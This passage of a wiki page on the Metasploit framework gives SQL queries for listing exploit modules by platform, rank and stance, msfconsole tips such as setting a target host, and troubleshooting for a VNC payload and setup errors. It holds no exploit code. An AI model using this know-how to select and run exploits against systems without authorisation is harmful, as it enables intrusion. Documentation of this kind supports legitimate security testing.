<br />
The {{ic|module_details}} table contains multiple columns and viewing them all at once is not convenient. To show only basic information about the modules:<br />
<br />
SELECT id, mtype, refname, disclosure_date, rank, stance, name<br />
FROM module_details;<br />
<br />
Show some information about available modules, include platform information from {{ic|module_platforms}}:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;<br />
<br />
Show all client (aggressive) exploits for Windows platform:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive';<br />
<br />
Show all exploits for Windows platform with rank >= 500 disclosed after 2013:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND rank >= 500<br />
AND disclosure_date >= TIMESTAMP '2013-1-1';<br />
<br />
Show all aggressive (client) exploits for Windows platform with rank >= 500 and include additional information about module's target:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets on module_details.id = module_targets.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive'<br />
AND rank >= 500<br />
order by target;<br />
<br />
=== Popularity of a platform by number of exploits ===<br />
<br />
To view the possible {{ic|platform}} values, and number of available exploits, run from {{ic|psql}}:<br />
<br />
SELECT name, count(*)<br />
FROM module_platforms<br />
GROUP BY name<br />
ORDER BY count DESC;<br />
<br />
=== Disable the ASCII banner on startup ===<br />
<br />
To disable the banner, run {{ic|msfconsole}} with {{ic|-q}}/{{ic|--quiet}} argument:<br />
<br />
$ msfconsole --quiet<br />
<br />
=== Preserve variable values between sessions ===<br />
<br />
If you don't want the variables to reset when selecting another module and when rerunning {{ic|msfconsole}} then set it globally via {{ic|setg}}, for example:<br />
<br />
msf > setg RHOST 192.168.56.102<br />
<br />
== Troubleshooting ==<br />
<br />
=== Cannot click in VNC viewer ===<br />
<br />
If you selected VNC viewer as a payload, but are unable to click or do any actions, that means you forgot to set the {{ic|ViewOnly}} variable to false. To fix this problem, re-run the exploit with the variable set to {{ic|false}}:<br />
<br />
msf > set ViewOnly false<br />
<br />
=== cannot load such file -- robots (LoadError) ===<br />
<br />
If you get an error like this:<br />
<br />
~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)<br />
from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'<br />
from ./msfconsole:48:in `<main>'<br />
<br />
This happens because the file {{ic|robots.rb}} has incorrect permissions and can be read only by the root user (see [https://github.com/fizx/robots/issues/6 the bug report]):<br />
<br />
{{hc|$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib|<br />
total 4<br />
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb<br />
}}<br />
<br />
To fix this, simply change the permission to be world-readable:<br />
<br />
# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb<br />
<br />
=== db_connect fails silently ===<br />
<br />
If upon running {{ic|db_connect}} you see no output, but later getting a message like this:<br />
<br />
[!] Database not connected or cache not built, using slow search<br />
<br />
that probably means that the {{ic|postgresql}} service is not running.<br />
<br />
== See also ==<br />
<br />
* [http://www.offensive-security.com/metasploit-unleashed/Main_Page Metasploit Unleashed security training]<br />
* [https://github.com/rapid7/metasploit-framework/wiki Metasploit wiki on GitHub]<br />
* [http://en.wikibooks.org/wiki/Metasploit The Metasploit Book]</div>Blastitt